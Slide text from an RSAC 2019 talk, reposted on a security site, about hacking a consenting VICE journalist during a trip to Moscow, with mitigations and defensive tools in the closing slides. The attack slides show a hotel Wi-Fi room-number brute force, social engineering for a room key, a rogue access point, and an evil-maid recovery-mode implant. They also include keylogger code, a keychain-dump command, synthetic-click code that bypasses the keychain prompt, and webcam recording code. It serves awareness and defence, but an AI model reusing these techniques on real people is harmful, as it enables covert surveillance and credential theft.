ht t07 when in russia hacking vice abroad

白帽子

2019/03/21 发布于 技术 分类

文字内容
1. #RSAC SESSION ID: HT-T07 WHEN IN RUSSIA HACKING VICE ABROAD Patrick Wardle Mikhail Sosonkin Chief Research Officer Digita Security @patrickwardle Security Researcher @hexlogic
2. WHOIS #RSAC chief research officer at digita security patrick wardle security researcher, synack red team member Mikhail Sosonkin
3. OUTLINE #RSAC the target intel gathering initial access persistent access mitigations
4. THE TARGET gianna toboni digita security
5. The Mission hack, hack, hack! #RSAC VICE:'>VICE: "hey guys, you'll be in moscow ya? can you hack our producer while she is there?" VICE:'>VICE: "everything is fair game...and you can be on TV!" Mike/Patrick:'>Patrick: "we could ...in Russia though!? ...sounds risky!!" Mike/Patrick:'>Patrick: "say no more, we're in" what could go wrong!?
6. The Target gianna toboni #RSAC + correspondent producer
7. The Location moscow, russia #RSAC moscow, russia Positive Hack Days conference only lasts 2 days!
8. GATHERING INTEL ...on short timeline digita security
9. Intel Required ...for a remote attack #RSAC what devices? possible delivery 'options' once we've identified a delivery option (wifi? email?), and the target's devices (macbook?, iPhone?), we can craft & deliver a custom malicious payload...
10. Intel Required (remote attack) what devices does the target use? #RSAC iPhone gianna image: vice.com macbook somewhere in .ru
11. Intel Required (remote attack) what 'delivery' options are available? #RSAC email with ? ...prolly not checking her email .ru? rogue wifi AP?
12. Intel Required for a physical ('evil maid') attack #RSAC target's location target's schedule once we've identified the target's location and schedule, an 'evil maid' attack should allow us to compromise the target's device(s).
13. Intel Required (physical attack) where is she? #RSAC Crowne Plaza: Россия,Москва, Краснопресненская наб.,12 target likely at conference hotel ...but in which room?
14. Intel Required (physical attack) can i haz your (room) number? #RSAC user name: you room number password: your last name, (upper) } hotel wifi system don't know the target's room number but there are a finite (sequential) list of rooms we know the target's last name
15. Intel Required (physical attack) can i haz your (room) number? #RSAC $ findROOM.py -u TOBONI make request [ [ [ [ error? no! yes room room room room 1 2 3 4 ] ] ] ] : : : : error error error error ... roomNumber++ [ room 2085 ] : error [ room 2086 ] : SUCCESS! User: 'TOBONI' is in Room: 2086 $ curl commands --cookie 'offer_accepted=1; path=/; expires=Thu, 17-May-2018 12:40:17 GMT' -L "http://62.148.xxx.yyy:3400/login_submit? login=${floor}${room}& password=TOBONI" room # : 2086 curl request
16. Intel Required (physical attack) can i haz your (room) number? #RSAC + patrick mike's wife "Hello, my name is Gianna Toboni in room 2086. My colleague Patrick will be stopping by - please give him a key to my room."
17. Intel Results #RSAC devices selected delivery mechanism + for remote attack:'>attack: rogue wifi for physical attack:'>attack: evil maid + room # : 2086 we have the key!
18. INITIAL ACCESS getting a foothold digita security
19. Remote Attack a rogue wifi access point (ap) #RSAC legit access point rogue access point } HooToo Travel Mate 6 runs linux small, easy to hide! bridge WiFi networks & create custom services
20. Remote Attack a rogue wifi access point (ap) #RSAC creating an open wifi network named "[HOTEL_NAME]_guest" with a strong signal was all it took... benignly named } strong signal dns server webserver etc...
21. Remote Attack a rogue wifi access point (ap) #RSAC redirect to login page target connects to rogue AP room number easier than 'hacking' a hotel to get room #? } password fake sign-in page
22. Remote Attack traffic redirection/modification #RSAC traffic redirection: 'dnsmasq' service inject malware } requests website (vice.com, yelp.com, etc.) not in russia! x www.vice.com alert: per vice policy, please download & install this VPN to secure your connection! 0day? inject iframe w/ download
23. Remote Attack traffic redirection/modification #RSAC traffic modification
24. Physical ('evil maid') Attack via recovery mode #RSAC + ⌘ + R boot into recovery mode open terminal copy malware into main partition a firmware password or full-disk encryption will thwart this!
25. Physical ('evil maid') Attack via recovery mode #RSAC # cp [malware] /Volumes/Macintosh HD/... infecting (main) partition recovery mode terminal
26. Physical ('evil maid') Attack via malicious devices #RSAC "When plugged in, the altered adapter can trick a Mac...allowing tweaks to its firmware"
27. Physical ('evil maid') Attack capturing credentials #RSAC OR... stealing passcodes via (hidden) camera #iamroot ...no password needed!
28. Physical ('evil maid') Attack ...in action! #RSAC
29. PERSISTENT ACCESS remote command and control digita security
30. Persistent Implant empyre (python) #RSAC python open-source extensible empyre } video screen audio google cloud virtual machine files commands
31. Persistence launch item (daemon/agent) #RSAC daemons & agents are started by launchd identifier auto launch plist instructs launchd how/when to load the item Label com.example.persist ProgramArguments /path/to/persist args? RunAtLoad binary
32. Getting r00t 'easy' on macOS #RSAC $ cat evil.scpt do shell script "say hi" with administrator privileges $ osascript evil.scpt trusted auth prompt? real hackers use 0days ;) most physical access attacks give you root, so a privilege escalation vulnerability is not needed!
33. Keylogging "Core Graphics...includes services for working with display hardware, lowlevel user input events, and the windowing system" -apple #RSAC 'A' 'A' 'A' 'sniffMK' github.com/objective-see/sniffMK //install & enable CG "event tap" eventMask = CGEventMaskBit(kCGEventKeyDown) CGEventMaskBit(kCGEventKeyUp); CGEventTapCreate(kCGSessionEventTap, kCGHeadInsertEventTap, 0, eventMask, eventCallback, NULL); core graphics keylogger CGEventTapEnable(eventTap, true); sniffing keys via 'core graphics'
34. Keylogging #RSAC everything typed; yes even passwords!
35. Dumping the Keychain all your passwords/keys are belong to us #RSAC passwords auth tokens } private keys " " $ /usr/bin/security dump-keychain -d login.keychain keychain: "~/Library/Keychains/login.keychain-db" class: "genp" attributes: 0x00000007 ="GitHub - https://api.github.com" data: "7257b03422bbab65f0e7d22be57c0b944a0ae45d9e" dumping keys mouse click to 'allow'
36. Synthetic Mouse Click enabling mouse keys //enable 'mouse keys' void enableMK(float X, float Y){ #RSAC //apple script NSAppleScript* scriptObject = [[NSAppleScript alloc] initWithSource: @"tell application \"System Preferences\"\n" \ "activate\n" \ "reveal anchor \"Mouse\" of pane id \"com.apple.preference.universalaccess\"\n" \ "end tell"]; //exec [scriptObject executeAndReturnError:nil]; //let it finish sleep(1); //clicky clicky CGPostMouseEvent(CGPointMake(X, Y), true, 1, true); CGPostMouseEvent(CGPointMake(X, Y), true, 1, false); return; } enabling 'Mouse Keys' in code " " launch: System Preferences open: Accessibility pane, and show Mouse anchor click: 'Enable Mouse Keys'
37. Synthetic Mouse Click sending a 'click' #RSAC //click via mouse key void clickAllow(float X, float Y) { //move mouse CGEventPost(kCGHIDEventTap, CGEventCreateMouseEvent(nil, kCGEventMouseMoved, CGPointMake(X, Y), kCGMouseButtonLeft)); //apple script NSAppleScript* scriptObject = [[NSAppleScript alloc] initWithSource: @"tell application \"System Events\" to key code 87\n"]; //exec [scriptObject executeAndReturnError:nil]; # ./sniffMK } sending a synthetic click note: keypad 5: key code 87 event:'>event:'>event:'>event:'>event:'>event:'>event:'>event: key down keycode:'>keycode: 0x57/87/5 event:'>event:'>event:'>event:'>event:'>event:'>event:'>event: key up keycode:'>keycode: 0x57/87/5 event:'>event:'>event:'>event:'>event:'>event:'>event:'>event: left mouse down (x:'>x: 146.207031, y:'>y: 49.777344) the key press also generates a 'mouse' event event:'>event:'>event:'>event:'>event:'>event:'>event:'>event: left mouse up (x:'>x: 146.207031, y:'>y: 49.777344) that apple does not block!!
38. Dumping the Keychain #RSAC
39. Spying via the Webcam recording, but that pesky LED #RSAC LED, hardware based › immutable? › signed firmware? tl;dr extremely difficult (even w/ physical access) Q: "Is it possible for someone to hack into the camera...and the green light not be on?" A: "This feature is implemented in the firmware... Now, while it's technically possible to replace that firmware, you would have to do some Mission Impossible sh** to pull that off (break into Apple/Chinese camera chip manufacturer, steal firmware source code, modify it, and then somehow inject it into the camera, which probably involves physically removing it from the computer" -reddit
40. Spying via the Webcam ...but the webcam is a shared resource #RSAC infected mac user initiates webcam session malware detects this & begins recording (until session ends) ...and exfil's it to remote attacker
41. Spying via the Webcam recording code #RSAC //capture session AVCaptureSession* session = [[AVCaptureSession alloc] init]; //video input AVCaptureDeviceInput* input = [AVCaptureDeviceInput deviceInputWithDevice:videoDevice ...]; //output file AVCaptureMovieFileOutput* output = [[AVCaptureMovieFileOutput alloc] init]; //add input [session addInput:input]; //add output [session addOutput:output]; //start session [session startRunning]; //start recording! [movieFileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"someFile"] recordingDelegate:self]; recoding off the webcam 'shared' access
42. Spying via the Webcam skype session #RSAC us (remote) } captured webcam session (target's fiancé) video audio
43. End Results: EVERYTHING! #RSAC unauthorized tweets free uber rides!
44. MITIGATIONS likelihood of getting hacked-- digita security
45. The (Harsh) Reality #RSAC #truth: "if somebody wants to hack you, they will" pegasus malware three iOS 0days! but, we can make it harder, ...or maybe even detect the hack
46. Remote Attacks 'standard-practice' mitigations #RSAC hacked? ...meh, doesn't matter fully updated/patched OS burner devices vpn for all traffic do not lie to federal officers do not attract attention do not act entitled } medium.com/@thegrugq/stop-fabricating-travel-security-advice-35259bf0e869
47. Remote Attacks other mitigations (travel-related) #RSAC } don't download/install anything! burner devices don't log in to any (important) accounts
48. Free Security Tools blockblock (persistence) #RSAC BlockBlock: monitors for persistence download: objective-see.com
49. Free Security Tools lulu (firewall) #RSAC LuLu: monitors for network connections download: objective-see.com
50. Free Security Tools oversight (webcam/mic) #RSAC OverSight: monitors for webcam & mic usage download: objective-see.com
51. Free Security Tools do not disturb (evil maid) #RSAC download: objective-see.com
52. Physical Attacks ...physical mitigations #RSAC "cover up your webcam" -(former) FBI director
53. Physical Attacks other 'best practice' mitigations #RSAC don't trust the safe set a boot/firmware password authenticate via biometrics keep your devices near by still, may not thwart a sophisticated attacker...
54. Always Remember... #RSAC what's could happen anyways...
55. CONCLUSION wrapping this up digita security
56. This is really happening! ...not just in the movies #RSAC
57. Take Aways #RSAC learned about: gathering intel gaining access persistent capabilities take aways: hackers likely 'win' (free!) mitigations can help
58. Contact Us #RSAC @patrickwardle @hexlogic
59. Credits #RSAC images resources - iconexperience.com - wirdou.com/2012/02/04/is-that-bad-doctor - http://pre04.deviantart.net/2aa3/th/pre/f/ 2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg - http://newosxbook.com/